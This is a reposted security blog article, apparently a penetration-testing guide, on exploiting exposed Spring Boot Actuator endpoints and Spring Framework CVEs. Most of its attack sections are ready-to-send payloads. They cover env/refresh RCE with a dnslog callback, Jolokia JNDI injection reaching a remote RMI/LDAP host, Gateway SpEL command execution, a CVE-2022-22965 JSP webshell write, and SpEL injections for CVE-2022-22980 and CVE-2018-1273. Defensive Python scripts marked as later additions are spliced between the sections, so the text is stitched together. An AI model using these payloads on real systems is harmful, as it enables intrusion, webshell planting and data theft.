[Technical Article] Spring Boot Testing Tips

admin · 2024-10-31 12:48:35 · 12 views · 7,193 characters · 23 min 58 s read
Introduction to Spring Boot

Spring Boot is an open-source Java framework designed to simplify the creation and deployment of Spring applications. It is part of the Spring platform and its third-party library ecosystem and was developed by the Pivotal team. Spring Boot lets developers get a new Spring application up and running faster by supplying default configuration that bootstraps the various Spring application contexts and third-party libraries.

Common Spring Boot endpoints


/swagger-ui.html  API test UI
/v2/api-docs  API documentation
/autoconfig  Auto-configuration report
/auditevents  Audit event information for the current application
/beans  Describes every bean in the application context
/configprops  Describes how configuration properties (including defaults) are injected into beans
/nacos-config  Records the Nacos account and password
/dump  Snapshot of thread activity
/env  All environment properties
/env/{name}  A specific environment property, looked up by name
/flyway  Database migration path (if present)
/health  Application health indicators, provided by HealthIndicator implementations
/info  Custom application information, taken from properties prefixed with info
/jolokia  Exposes JMX beans over HTTP
/logfile  Returns the log file contents (if logging.file or logging.path is set)
/metrics  Reports the application metric with the given name
/heapdump  Returns a GZip-compressed hprof dump file
/mappings  Describes every URI path and how it maps to controllers (including Actuator endpoints)
/refresh  After setting a property with a POST to /env, a POST to /restart restarts the application and can trigger the related RCE vulnerability
/gateway  Separates client requests from backend applications; provides routing, filtering, predicates, rate limiting and logging/monitoring
/restart  API test interface
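Before testing an application for the endpoints listed above, it helps to know what a hit on one of them looks like in the access log. The script below is an added example, not code from the original article: it parses Common Log Format lines, reports every request to one of the sensitive paths, and flags clients that issued a POST to /env followed by a POST to /refresh or /restart (the chain the /refresh entry describes). The SAMPLE_LOG lines and the /actuator base path are constructed assumptions.

```python
import re
from collections import defaultdict

# Sensitive Actuator paths from the list above (assumption: the application
# serves them under /actuator, the Spring Boot 2.x default base path).
SENSITIVE_PATHS = {
    "/actuator/env", "/actuator/heapdump", "/actuator/jolokia",
    "/actuator/beans", "/actuator/configprops", "/actuator/mappings",
    "/actuator/logfile", "/actuator/refresh", "/actuator/restart",
    "/actuator/gateway/routes", "/swagger-ui.html", "/v2/api-docs",
}
# Write sequence described by the /refresh entry: POST /env, then /refresh or /restart.
WRITE_CHAIN = ("/actuator/env", "/actuator/refresh", "/actuator/restart")

# Common Log Format: ip ident user [timestamp] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    """Return a dict with ip/ts/method/path/status, or None for unparseable lines."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    # Drop the query string and trailing slash so prefix matching is stable.
    rec["path"] = rec["path"].split("?", 1)[0].rstrip("/") or "/"
    return rec

def is_sensitive(path):
    return any(path == p or path.startswith(p + "/") for p in SENSITIVE_PATHS)

def analyze(lines):
    """Return (hits, chains): hits is every request to a sensitive path as
    (ip, method, path, status); chains lists clients that POSTed to /env and
    then POSTed to /refresh or /restart."""
    hits = []
    posts_by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if is_sensitive(rec["path"]):
            hits.append((rec["ip"], rec["method"], rec["path"], rec["status"]))
            if rec["method"] == "POST":
                posts_by_ip[rec["ip"]].append(rec["path"])
    chains = [
        ip for ip, paths in posts_by_ip.items()
        if WRITE_CHAIN[0] in paths and any(p in paths for p in WRITE_CHAIN[1:])
    ]
    return hits, sorted(chains)

# Constructed log lines (not captured from any real system).
SAMPLE_LOG = [
    '203.0.113.7 - - [31/Oct/2024:12:48:35 +0800] "GET /actuator/health HTTP/1.1" 200 15',
    '203.0.113.7 - - [31/Oct/2024:12:48:36 +0800] "GET /actuator/env/java.home?x=1 HTTP/1.1" 200 120',
    '203.0.113.7 - - [31/Oct/2024:12:48:40 +0800] "POST /actuator/env HTTP/1.1" 200 63',
    '203.0.113.7 - - [31/Oct/2024:12:48:41 +0800] "POST /actuator/refresh HTTP/1.1" 200 2',
    '198.51.100.2 - - [31/Oct/2024:12:50:01 +0800] "GET /v2/api-docs HTTP/1.1" 401 0',
    '198.51.100.2 - - [31/Oct/2024:12:50:02 +0800] "GET /index.html HTTP/1.1" 200 512',
    'not a log line',
]

if __name__ == "__main__":
    hits, chains = analyze(SAMPLE_LOG)
    for hit in hits:
        print("sensitive endpoint hit:", hit)
    print("env/refresh write chain from:", chains)
```

Prefix matching is deliberate: /actuator/env/java.home and /actuator/gateway/routes/testxxx are as interesting as the bare path, and a 401 on /v2/api-docs still tells you someone is probing.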


Common vulnerabilities in each Spring Boot endpoint

1. The env endpoint

    1) Unauthenticated information disclosure (endpoint data can be viewed without authorization)

    2) RCE (via eureka.client.serviceUrl.defaultZone)

    POC:

#1. Set the serviceUrl value and start a listener on your VPS
POST /openapi/actuator/env HTTP/1.1
Host: IP
Content-Type: application/json
Content-Length: 85

{"name":"eureka.client.serviceUrl.defaultZone","value":"http://¥{PID}your.dnslog.cn"}

#2. Call the refresh endpoint, then inspect and decode what the VPS received
POST /openapi/actuator/refresh HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Content-Type: application/json
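The disclosure side of /env comes down to whether sensitive property values reach the caller unmasked. The script below is an added example, not code from the original article: it audits an /actuator/env response for keys matching an approximation of the Spring Boot 2.x Sanitizer's default key patterns whose value is not the ****** mask, and for URL values with embedded credentials. The SAMPLE_ENV document and the pattern list are constructed assumptions.

```python
import re

# Approximation of the Spring Boot 2.x Sanitizer's default key patterns
# (assumption: the audited instance runs Boot 2.x; Boot 3 masks every value
# unless show-values is enabled). Plain entries match as key suffixes, regex
# entries match the whole key; both comparisons are case-insensitive.
PLAIN_SUFFIXES = ("password", "secret", "key", "token", "sun.java.command", "vcap_services")
REGEX_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (r".*credentials.*", r"^vcap\.services.*$")]
MASK = "******"
# user:password@ inside a URL-shaped value
USERINFO_RE = re.compile(r"://[^/@\s]+:[^/@\s]+@")

def is_sensitive_key(key):
    k = key.lower()
    return k.endswith(PLAIN_SUFFIXES) or any(p.fullmatch(k) for p in REGEX_PATTERNS)

def audit_env(env_doc):
    """Walk an /actuator/env JSON document (already parsed into a dict) and
    return (property_source, key, reason) for every value that should have
    been masked but was not."""
    findings = []
    for source in env_doc.get("propertySources", []):
        for key, entry in source.get("properties", {}).items():
            value = str(entry.get("value", ""))
            if is_sensitive_key(key) and value != MASK:
                findings.append((source["name"], key, "sensitive key not masked"))
            elif USERINFO_RE.search(value) and MASK not in value:
                findings.append((source["name"], key, "credentials embedded in URL"))
    return findings

# Constructed /actuator/env response (not taken from any real system).
SAMPLE_ENV = {
    "activeProfiles": ["prod"],
    "propertySources": [
        {"name": "systemProperties",
         "properties": {"java.home": {"value": "/usr/lib/jvm/java-11"},
                        "sun.java.command": {"value": "******"}}},
        {"name": "applicationConfig: [classpath:/application.properties]",
         "properties": {"spring.datasource.password": {"value": "******"},
                        "nacos.config.password": {"value": "example-plain-text"},
                        "aws.credentials.sessionToken": {"value": "example-session"},
                        "spring.rabbitmq.addresses": {"value": "amqp://guest:guest@mq.internal:5672"}}},
    ],
}

if __name__ == "__main__":
    for source, key, reason in audit_env(SAMPLE_ENV):
        print(f"{reason}: {key} (from {source})")
```

Run this against your own instance's /env output: anything it reports is a value that a non-default property name (nacos.config.password is caught only because it ends in "password") or a URL-embedded credential would leak even where the endpoint is otherwise considered safe to expose.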


2. The swagger-ui.html and /v2/api-docs endpoints

    1) Unauthenticated access (the API documentation can be viewed without authorization, and the documented interfaces can then be tested for unauthorized access, injection and other vulnerability classes)

3. The nacos-config endpoint

    1) Unauthenticated access and information disclosure (this endpoint yields the Nacos account and password and with it a large amount of sensitive information; Nacos also has an RCE vulnerability that can be tried to obtain access)

4. The jolokia endpoint

    1) Command execution 1 (Jolokia Logback JNDI injection: /jolokia/exec/ch.qos.logback.classic: loads a remote malicious class, causing RCE)

1. Start a malicious LDAP server
2. Create a logback.xml with the following content:
<configuration>
  <insertFromJNDI env-entry-name="ldap://malicious-ldap-address" as="appName" />
</configuration>
3. Trigger the JNDI injection with the following URL:
http://localhost:9094/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/192.168.0.108:8000!/logback.xml

    2) Command execution 2 (Jolokia Realm JNDI injection: the realm connects to a malicious RMI endpoint, causing RCE)

#!/usr/bin/env python3
# coding: utf-8
import requests

url = 'http://127.0.0.1/actuator/jolokia'

# Create a JNDIRealm under the Engine through the Tomcat MBeanFactory
create_realm = {
    "mbean": "Tomcat:type=MBeanFactory",
    "type": "EXEC",
    "operation": "createJNDIRealm",
    "arguments": ["Tomcat:type=Engine"]
}
# Point the realm's JNDI context factory at the RMI registry implementation
write_factory = {
    "mbean": "Tomcat:realmPath=/realm0,type=Realm",
    "type": "WRITE",
    "attribute": "contextFactory",
    "value": "com.sun.jndi.rmi.registry.RegistryContextFactory"
}
# Set the realm's connection URL
write_url = {
    "mbean": "Tomcat:realmPath=/realm0,type=Realm",
    "type": "WRITE",
    "attribute": "connectionURL",
    "value": "rmi://krk9ve.ceye.io"
}
stop = {
    "mbean": "Tomcat:realmPath=/realm0,type=Realm",
    "type": "EXEC",
    "operation": "stop",
    "arguments": []
}
# Restarting the realm makes it open the JNDI connection
start = {
    "mbean": "Tomcat:realmPath=/realm0,type=Realm",
    "type": "EXEC",
    "operation": "start",
    "arguments": []
}

flow = [create_realm, write_factory, write_url, stop, start]
for i in flow:
    print('%s MBean %s: %s ...' % (i['type'].title(), i['mbean'], i.get('operation', i.get('attribute'))))
    r = requests.post(url, json=i)
    print(r.status_code, r.json())
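Both Jolokia chains above depend on exec and write commands reaching the agent. The script below is an added example, not the article's code: it mirrors a read-only Jolokia access policy (what a jolokia-access.xml that lists only the read, list, search and version commands would enforce) and applies it to both the POST body form and the GET URL form, whose "!/" escaping is decoded by split_jolokia_path. The sample requests and the hostname config.example.internal are constructed; the read-only posture is an assumption about the deployment.

```python
import json

# Commands treated as read-only; exec and write are denied. This is the effect
# of a jolokia-access.xml whose <commands> block lists only these entries
# (assumption: the deployment never needs remote MBean invocation or writes).
ALLOWED_COMMANDS = {"read", "list", "search", "version"}

def split_jolokia_path(rest):
    """Split a Jolokia GET path on unescaped '/'. Jolokia encodes a literal '/'
    inside a segment as '!/' and a literal '!' as '!!'."""
    segments, current, i = [], [], 0
    while i < len(rest):
        ch = rest[i]
        if ch == "!" and i + 1 < len(rest):
            current.append(rest[i + 1])   # escaped character, taken literally
            i += 2
        elif ch == "/":
            segments.append("".join(current))
            current = []
            i += 1
        else:
            current.append(ch)
            i += 1
    segments.append("".join(current))
    return segments

def parse_get_request(path, base="/actuator/jolokia"):
    """Convert a Jolokia GET URL into the same dict shape as a POST body."""
    path = path.split("?", 1)[0]
    if not path.startswith(base):
        raise ValueError("not a Jolokia URL: " + path)
    rest = path[len(base):].strip("/")
    if not rest:
        return {"type": "version"}
    parts = split_jolokia_path(rest)
    req = {"type": parts[0].lower()}
    if req["type"] == "exec" and len(parts) >= 3:
        req.update(mbean=parts[1], operation=parts[2], arguments=parts[3:])
    elif req["type"] == "write" and len(parts) >= 4:
        req.update(mbean=parts[1], attribute=parts[2], value=parts[3])
    elif req["type"] in ("read", "list", "search") and len(parts) >= 2:
        req.update(mbean=parts[1], attribute=parts[2] if len(parts) > 2 else None)
    return req

def check_request(req):
    """Return (allowed, reason) for one Jolokia request dict."""
    command = str(req.get("type", "")).lower()
    if command in ALLOWED_COMMANDS:
        return True, f"{command} on {req.get('mbean', '*')} allowed"
    detail = req.get("operation") or req.get("attribute") or "?"
    return False, f"{command} on {req.get('mbean', '?')} ({detail}) denied by read-only policy"

def check_body(raw_json):
    """Check a POST body, which may carry one request or a bulk list of them.
    Returns (allowed, reasons); a bulk request is denied if any element is."""
    body = json.loads(raw_json)
    requests_ = body if isinstance(body, list) else [body]
    results = [check_request(r) for r in requests_]
    return all(ok for ok, _ in results), [reason for _, reason in results]

# Constructed sample requests (not captured from any real system).
READ_BODY = '{"type":"read","mbean":"java.lang:type=Memory","attribute":"HeapMemoryUsage"}'
BULK_BODY = ('[{"type":"read","mbean":"java.lang:type=Runtime","attribute":"Uptime"},'
             '{"type":"EXEC","mbean":"Tomcat:type=MBeanFactory","operation":"createJNDIRealm",'
             '"arguments":["Tomcat:type=Engine"]}]')
RELOAD_URL = ("/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,"
              "Type=ch.qos.logback.classic.jmx.JMXConfigurator"
              "/reloadByURL/http:!/!/config.example.internal!/logback.xml")

if __name__ == "__main__":
    print(check_body(READ_BODY))
    print(check_body(BULK_BODY))
    print(check_request(parse_get_request(RELOAD_URL)))
```

Two details matter when you put a check like this in front of Jolokia: the command name is case-insensitive on the agent side (the Realm script above sends "EXEC"), and a bulk POST can hide a single exec among harmless reads, so the whole batch has to be evaluated.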

5. The heapdump endpoint

    1) Unauthenticated information disclosure (load the file with the JDK's own jvisualvm.exe, or extract the data with https://github.com/wyzxxz/heapdump_tool)


6. The gateway endpoint

    1) /gateway/route RCE (add a malicious route to achieve RCE)

1. Add a malicious route
POST /actuator/gateway/routes/testxxx HTTP/1.1
Host: 192.168.42.145:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 334

{"id": "testxxx","filters": [{"name": "AddResponseHeader","args": {"name": "Result","value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"whoami"}).getInputStream()))}"}}],"uri": "http://example.com"}

2. Refresh the routes
POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.42.145:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 334

{}

3. Request the route to trigger command execution
GET /actuator/gateway/routes/testxxx HTTP/1.1
Host: 192.168.42.145:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 334


Other Spring Framework vulnerabilities

1. Spring Framework RCE (CVE-2022-22965)

POC:

GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1

Shell address: http://127.0.0.1:8080//tomcatwar.jsp?pwd=j&cmd=whoami

2. Spring Data MongoDB SpEL expression injection (CVE-2022-22980)

POC:

POST /get HTTP/1.1
Host: 172.17.148.66:9576
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
cmd: id
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 5737

a=T(java.lang.Runtime).getRuntime().exec("ping vfxbpdoaqs.dnstunnel.run")

3. Spring Data Commons RCE (CVE-2018-1273)

POST /users?page=&size=5 HTTP/1.1
Host: localhost:8080
Connection: keep-alive
Content-Length: 124
Pragma: no-cache
Cache-Control: no-cache
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost:8080/users?page=0&size=5
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=


That is all for this article; new material will be added as it comes up. Thanks for reading.


Originally published on the WeChat official account 小羊安全屋: [Technical Article] Spring Boot Testing Tips

Published by admin on 2024-10-31 12:48:35. Please keep this link when reposting (CN-SEC: thanks to the original author for their work): https://cn-sec.com/archives/3337757.html
